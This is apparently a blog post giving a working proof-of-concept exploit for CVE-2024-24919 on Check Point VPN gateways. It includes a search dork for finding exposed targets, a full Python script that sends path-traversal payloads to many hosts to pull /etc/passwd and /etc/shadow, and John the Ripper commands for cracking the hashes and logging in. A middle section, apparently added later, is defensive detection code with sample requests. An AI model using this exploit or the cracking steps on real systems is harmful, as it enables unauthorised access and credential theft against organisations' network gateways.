CVE-2024–24919 POC

Very Lazy Tech
3 min read · Jun 2, 2024


CVE-2024-24919 potentially allows an attacker to read certain information on Check Point Security Gateways that are connected to the internet and have the Remote Access VPN or Mobile Access Software Blades enabled. A security fix that mitigates this vulnerability is available.

Read about it — https://nvd.nist.gov/vuln/detail/CVE-2024-24919

This POC is made for educational and ethical testing purposes only. Usage of this tool for attacking targets without prior mutual consent is illegal. It is the end user’s responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program.

So let's start!

To find some targets I used Fofa (similar to shodan.io):

Fofa Dork: app="Check_Point-SSL-Network-Extender"

Now git clone the repository:

git clone https://github.com/verylazytech/CVE-2024-24919.git

Or copy exploit.py manually:

import argparse
import requests
import urllib3
from urllib3.exceptions import InsecureRequestWarning

# Suppress SSL warnings (the script talks to gateways with self-signed certs)
urllib3.disable_warnings(InsecureRequestWarning)

# Strings that only appear if the gateway returned a real /etc/passwd or /etc/shadow
vuln = ['root:', 'nobody:']

def make_request(url, payload=None, headers=None):
    try:
        response = requests.post(url, data=payload, headers=headers, verify=False)
        if response.ok:
            for word in vuln:
                if word in response.text:
                    print(f"[+] {url} is vulnerable")
                    if payload:
                        # Save the returned file under a name matching the payload
                        if "etc/shadow" in payload:
                            print("╔══════════════════════════════════════════════════════╗")
                            print("║ /etc/shadow found: ║")
                            print("╚══════════════════════════════════════════════════════╝")
                            with open("shadow", "w") as file:
                                file.write(response.text)
                        elif "etc/passwd" in payload:
                            print("╔══════════════════════════════════════════════════════╗")
                            print("║ /etc/passwd found: ║")
                            print("╚══════════════════════════════════════════════════════╝")
                            with open("passwd", "w") as file:
                                file.write(response.text)
                    print("╔══════════════════════════════════════════════════════╗")
                    print(f" {response.text} ")
                    print("╚══════════════════════════════════════════════════════╝")
                    print("If you found this useful, consider buying me a coffee:")
                    print("https://www.buymeacoffee.com/VeryLazyTech")
                    print("@VeryLazyTech")
                    return
            print(f"[-] {url} is not vulnerable")
        else:
            print(f"[-] {url} responded with status code: {response.status_code}")
    except requests.RequestException as e:
        print(f"Error making request to {url}: {e}")

def main():
    payload = "aCSHELL/../../../../../../../etc/passwd"
    payload2 = "aCSHELL/../../../../../../../etc/shadow"
    parser = argparse.ArgumentParser(description="CVE-2024-24919 POC - VeryLazyTech")
    parser.add_argument("-l", metavar='filename', type=str, help="File containing list of HTTP/HTTPS targets")
    parser.add_argument("-f", metavar='file', type=str, help="File to read for custom payload (May break on multiple targets with unknown files.)")
    args = parser.parse_args()

    # Browser-like headers sent with every request
    headers = {
        "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0",
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
        "Accept-Language": "en-US,en;q=0.5",
        "Accept-Encoding": "gzip, deflate, br",
        "Upgrade-Insecure-Requests": "1",
        "Sec-Fetch-Dest": "document",
        "Sec-Fetch-Mode": "navigate",
        "Sec-Fetch-Site": "none",
        "Sec-Fetch-User": "?1",
        "Dnt": "1",
        "Sec-Gpc": "1",
        "Te": "trailers",
        "Connection": "close"
    }

    payload_base = "aCSHELL/../../../../../../../{}"

    # -f replaces the default /etc/passwd payload with a user-chosen file
    if args.f:
        payload = payload_base.format(args.f)

    if args.l:
        try:
            with open(args.l, 'r') as file:
                urls = file.readlines()
            for url in urls:
                url = url.strip()
                if url.startswith('http://') or url.startswith('https://'):
                    make_request(url + '/clients/MyCRL', payload=payload, headers=headers)
                    make_request(url + '/clients/MyCRL', payload=payload2, headers=headers)
                else:
                    print(f"Skipping invalid URL: {url}")
        except FileNotFoundError:
            print(f"Error: File '{args.l}' not found.")
    else:
        print("Please provide a file containing list of HTTP/HTTPS targets using -l option.")

if __name__ == "__main__":
    main()
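For the defending side, here is an added example (my own code, not part of the original post or of the verylazytech repository) that turns the indicators visible in the script above into detection logic: a POST to /clients/MyCRL whose body contains the "../" traversal chain or names /etc/passwd or /etc/shadow. The record format (method, path, body fields) and the sample records are constructed for the example and assume request bodies are available, e.g. from a reverse proxy or WAF export in front of the gateway.

```python
import re
from typing import Dict, Iterable, List
from urllib.parse import unquote

# Indicators taken from the PoC: the request path and the traversal prefix
# it uses to walk up to files under /etc.
TARGET_PATH = "/clients/MyCRL"
TRAVERSAL = re.compile(r"(?:\.\./){2,}")      # two or more "../" segments
SENSITIVE_FILES = ("etc/passwd", "etc/shadow")


def is_cve_2024_24919_attempt(method: str, path: str, body: str) -> bool:
    """Return True if a request matches the PoC's traversal against MyCRL."""
    if method.upper() != "POST" or path.rstrip("/") != TARGET_PATH:
        return False
    decoded = unquote(body)   # normalise percent-encoding before matching
    if TRAVERSAL.search(decoded):
        return True
    return any(name in decoded for name in SENSITIVE_FILES)


def scan_records(records: Iterable[Dict[str, str]]) -> List[Dict[str, str]]:
    """Filter request records down to those that look like exploitation attempts."""
    return [
        r for r in records
        if is_cve_2024_24919_attempt(r["method"], r["path"], r["body"])
    ]


# Constructed sample records (assumed export format; not real traffic).
# The first two mirror the payloads the PoC sends; the rest are benign.
SAMPLE_RECORDS = [
    {"src": "203.0.113.10", "method": "POST", "path": "/clients/MyCRL",
     "body": "aCSHELL/../../../../../../../etc/passwd"},
    {"src": "203.0.113.10", "method": "POST", "path": "/clients/MyCRL",
     "body": "aCSHELL/../../../../../../../etc/shadow"},
    {"src": "192.0.2.5", "method": "GET", "path": "/clients/MyCRL", "body": ""},
    {"src": "192.0.2.7", "method": "POST", "path": "/clients/MyCRL",
     "body": "crl-request"},   # constructed benign body
    {"src": "192.0.2.9", "method": "POST", "path": "/sslvpn/Login/Login",
     "body": "user=alice"},
]

if __name__ == "__main__":
    for hit in scan_records(SAMPLE_RECORDS):
        print(f"[ALERT] {hit['src']} {hit['method']} {hit['path']} body={hit['body']!r}")
```

Matching on the path plus the traversal pattern rather than on the literal "aCSHELL" prefix keeps the rule useful if the prefix is changed with -f; the percent-decoding step is ordinary WAF normalisation so the comparison is done on what the server would actually see.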

Save this exploit in a Python file, e.g. exploit.py.

Next, choose your target and add it to a list.txt file in this format:

https://ip_address

Run the Exploit:

python3 exploit.py -l list.txt

Now there are two possible outputs:

Unsuccessful: the script prints [-] <url> is not vulnerable (or the HTTP status code the gateway returned).

Successful: the script prints [+] <url> is vulnerable followed by the returned file contents, and writes them to the files passwd and shadow in the current directory.

Now that you have both files, passwd and shadow, you can try to crack the hashes with John the Ripper: merge the two files into one and run john against it (I used rockyou.txt, but it can be any password wordlist):

unshadow passwd shadow > unshadowed.txt 
john --wordlist=/usr/share/wordlists/rockyou.txt unshadowed.txt

And now, after we crack the hash, we can log in as that user!

📎 If You like my content and you want some more, View On My Shop bundle of 20+ E-Books for your OSCP!

📎 Buy me a Coffee
